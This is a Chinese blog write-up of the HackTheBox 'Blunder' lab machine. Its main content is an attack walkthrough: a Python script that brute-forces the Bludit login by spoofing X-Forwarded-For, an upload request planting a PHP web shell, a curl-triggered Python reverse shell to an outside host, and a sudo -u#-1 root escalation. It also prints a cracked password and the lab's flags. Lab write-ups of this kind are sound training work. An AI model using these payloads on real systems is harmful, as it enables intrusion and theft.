[Meachines] [Easy] Blunder Bludit-CMS-Upload+SUDO-Bypass权限提升

最新推荐文章于 2024-07-29 17:15:00 发布
最新推荐文章于 2024-07-29 17:15:00 发布
阅读量106 收藏 2
点赞数 6
分类专栏: HackTheBox 文章标签: 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140758877
版权

信息收集

IP AddressOpening Ports
10.10.10.191TCP:80

$ nmap -p- 10.10.10.191 --min-rate 1000 -sC -sV

80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)

www-data 权限

image.png

$ gobuster dir -u "http://10.10.10.191/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

http://10.10.10.191/todo.txt

image-2.png

username:fergus

$ cewl 10.10.10.191 > pass.txt

#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []


with open('pass.txt', 'r') as words:
    for line in words:
        line = line.rstrip()
        wordlist.append(line)


for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)

    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p=password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break

$ python3 exp.py

image-3.png

Password:RolandDeschain

image-4.png

https://github.com/bludit/bludit/issues/1081

image-5.png

image-6.png

POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423763520129402281753554177338
Content-Length: 173373
Origin: http://10.10.10.191
Connection: close
Referer: http://10.10.10.191/admin/new-content
Cookie: BLUDIT-KEY=7vn276oblmdb0l4kt4n3sltkl5


-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="images[]"; filename="TEAM.php"
Content-Type: image/png


<?=phpinfo();system($_GET[0]);?>
-----------------------------423763520129402281753554177338

Content-Disposition: form-data; name="uuid"


../../tmp
-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="tokenCSRF"


96062fa2efef00e52320951d57034af3a4f480f4
-----------------------------423763520129402281753554177338--

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

$ curl "http://10.10.10.191/bl-content/tmp/TEAM.php?0=python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.16.6%22%2C10032))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fsh%22)'"

image-9.png

User 权限

$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php

image-10.png

username:hugo
hash:faca404fd5c0a31cf1897b823c695c85cffeb98d

https://md5decrypt.net/en/Sha1/

!外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

password:Password120

image-12.png

User.txt

$ cat /home/hugo/user.txt

cb37fd3c2e81e209769763b3fd001348

权限提升

image-13.png

$ sudo --version

image-15.png

image-14.png

$ sudo -u#-1 /bin/bash

image-16.png

Root.txt

# cat /root/root.txt

d10d349c006d7beb3e00cf067fba123d

Мартин.
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox - blunder (Bludit渗透&cewl使用 & sudo提权)
冬萍子癸水
01-09 871
C:\root> masscan -p1-65535,U:1-65535 10.10.10.191 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-01-08 00:00:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts
Blunder-开源
04-15
Blunder是用于分析Java中的链式异常的自动化工具。 这对于分类,生成自定义的错误消息以及可能的解决方案列表很有用。
【Hack The Box】linux练习-- Blunder
人间体佐菲的博客
11-27 185
【Hack The Box】linux练习-- Blunder
Hack The Box——Blunder
热门推荐
江左盟的博客
08-25 1万+
简介 信息收集 使用nmap快速扫描目标主机端口和服务,目标主机仅开启了80端口,运行这Apache httpd 2.4.41,操作系统为Ubuntu,内核可能为2.6.32,如图: 然后访问80端口web服务,发现是作者记录的一些文章,如图: 随手输入admin发现页面跳转到登录页面,如图: 测试发现不存在常用弱口令和SQL注入,使用Google搜索BLUDIT发现此CSM系统存在很多已知漏洞,如目录遍历、文件上传、代码执行和暴力破解绕过。前面三个漏洞都需要拥有用户名和密码才能.
Cocos2D-X弹出对话框的实现与封装
lognic10的专栏
06-30 2047
在用Cocos2DX引擎开发游戏的过程中,我们经常需要弹出一个对话框或者提示框,通知玩家一些必要的信息。这时候我们就需要考虑怎样设计和封装一个这样的弹出对话框。首先,这样的弹出框一般都是“模态窗口”,即在没有对当前弹出的对话框进行确认的时候,不能继续往下操作。                一个对话框一般包含几个部分:背景图、两个按钮(个数可定制)、标题、文字内容。我们需要使对话框为模
Blunder Chess Tools-开源
04-27
与国际象棋有关的软件工具库。 当前包括一个完整的程序包,用于分析您的游戏,搜索错误和错过的机会,然后反复检查它们,从而改善您的游戏。
faux-pas:一个简化Java功能编程错误处理的库
02-03
Faux pas名词,/fəʊpɑː/:blunder; 错误的步骤,错误的步骤 F辅助开关数p作为是一个库,适用于F unctional p在Java的在AGC处理简化了错误。 它修复了默认情况下Java Runtime中的任何功能接口均不允许抛出已检查...
blunder:现代客户端 JavaScript 错误处理程序
05-31
npm install @ryanmorr/blunder 用法 Blunder 提供了在浏览器中增强、分派、捕获和报告 JavaScript 错误的能力。 import { monitor , subscribe , dispatch , report } from '@ryanmorr/blunder' ; // Listen for ...
xmc-blunder:XMC是计算机科学的竞赛管理和学习平台
04-29
XMC 警告:XMC处于深度开发中,非常不稳定,对于实际工作肯定是不安全的。 在达到稳定版本之前,可能无法向后兼容。 documentația pentru Infoeducatie, 。XMC管理比赛XMC是由和制造的计算机科学的现代,可扩展的...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 320
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络安全在2024好入行吗?
最新发布
2401_84466225的博客
07-29 335
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 221
一、网络应用(层)内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用层”就在这个协议的最上层。
S5730举例
jjjxxxhhh123的博客
07-27 942
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
Linux网络:传输层协议TCP(二)三次挥手四次握手详解
2201_75880188的博客
07-24 1378
详细介绍了TCP协议中三次挥手四次握手的含义与原理,阐述其必要性和可靠性,以及其设计原理和在一些特定场景下TCP协议面对三次挥手四次握手出现异常时的处理机制
uniapp使用WebSocket uniapp使用WebSocket Uniapp整合WebSocket uniapp使用 websocket
半只
07-29 104
代码中的示例只在 H5、APP环境下成功运行,小程序环境下如果无效,需要使用预编译 - 条件性的编译,适配 小程序环境#ifdef H5:针对 Web H5页面。:针对原生应用(Android 和 iOS)。:针对微信小程序。:针对支付宝小程序。:针对百度小程序。:针对字节跳动小程序。:针对 QQ 小程序。:针对快手小程序。:针对京东小程序。
大学计算机专业主要课程及概要介绍
07-26 1370
计算机专业还包含丰富的实践教学环节,如工程训练、计算机应用基础训练、认识实习、生产实习、毕业实习、教学实验、社会实践、课程设计和毕业设计等。这些环节旨在通过实际操作和项目经验,提升学生的动手能力和解决实际问题的能力。综上所述,大学计算机专业课程设置全面且深入,旨在培养学生在计算机科学与技术领域的综合能力和创新精神。通过系统的学习和实践,学生将能够掌握计算机科学的基本理论和技术,为未来的职业发展打下坚实的基础。大学计算机专业是一门涵盖广泛领域的学科,旨在培养学生在计算机科学与技术方面的理论知识与实践能力。
“微软蓝屏”事件暴露了网络安全哪些问题
骑上单车去旅行的博客
07-24 958
通过不同领域的技术融合,原有行业的传统模式和业务模型得到改变,进而引发行业的升级和转型。例如,互联网技术的发展和应用,对传统行业如零售、金融等产生了巨大的冲击,推动了行业的数字化、智能化和创新转型。总之,跨领域连锁反应对行业的影响是多方面的,它能够促进行业之间的合作与融合,推动行业的升级和转型,促进行业的跨界创新,提升行业的全球竞争力。通过及时的监控和反馈,可以快速发现并解决潜在的问题,提高软件的质量和稳定性。通过与其他领域的跨界合作和创新,行业能够更好地补充和整合资源,提升自身的创新能力和竞争力。
计算机网络知识点总结————物理层
weixin_64449542的博客
07-24 361
我站在清醒和麻木的边缘,不能堕落也不能解脱一、物理层的基本概念总结计算机网络物理层的一些小知识。
[Windows CMD] 检测网络连通性 ping
ERIC-ZI的博客
07-25 507
ping是一个非常常用的网络工具,用于测试网络连接的可达性和测量网络延迟。它通过发送 ICMP (Internet Control Message Protocol) Echo Request 数据包到目标主机,并等待接收回显应答 (Echo Reply) 来工作。ping命令可以帮助您快速检测网络问题,例如连接中断或延迟过高。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值